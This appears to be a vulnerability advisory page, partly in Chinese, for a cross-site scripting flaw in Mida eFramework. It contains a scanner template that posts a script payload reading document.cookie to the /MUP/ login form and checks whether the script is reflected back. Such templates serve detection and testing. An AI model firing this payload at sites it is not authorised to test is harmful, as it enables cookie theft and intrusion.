mida-eframework-xss: Mida eFramework - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Mida eFramework | POC: 已公开

漏洞描述

Mida eFramework contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: mida-eframework-xss

info:
  name: Mida eFramework - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: Mida eFramework contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.exploit-db.com/exploits/48768
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: mida,xss,edb

http:
  - raw:
      - |
        POST /MUP/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{Hostname}}/MUP

        UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"><script>javascript:alert(document.cookie)</script>'
# digest: 4b0a00483046022100acb43712d6d29a754349836c6c0d7f813fd37099cd0272c60c0d354786e278710221009c4ca737b8375197da3c9f65b8415ea6c8aa15fe6da06a2946537534853a8506:922c64590222798bb761d5b6d8e72950

相关漏洞推荐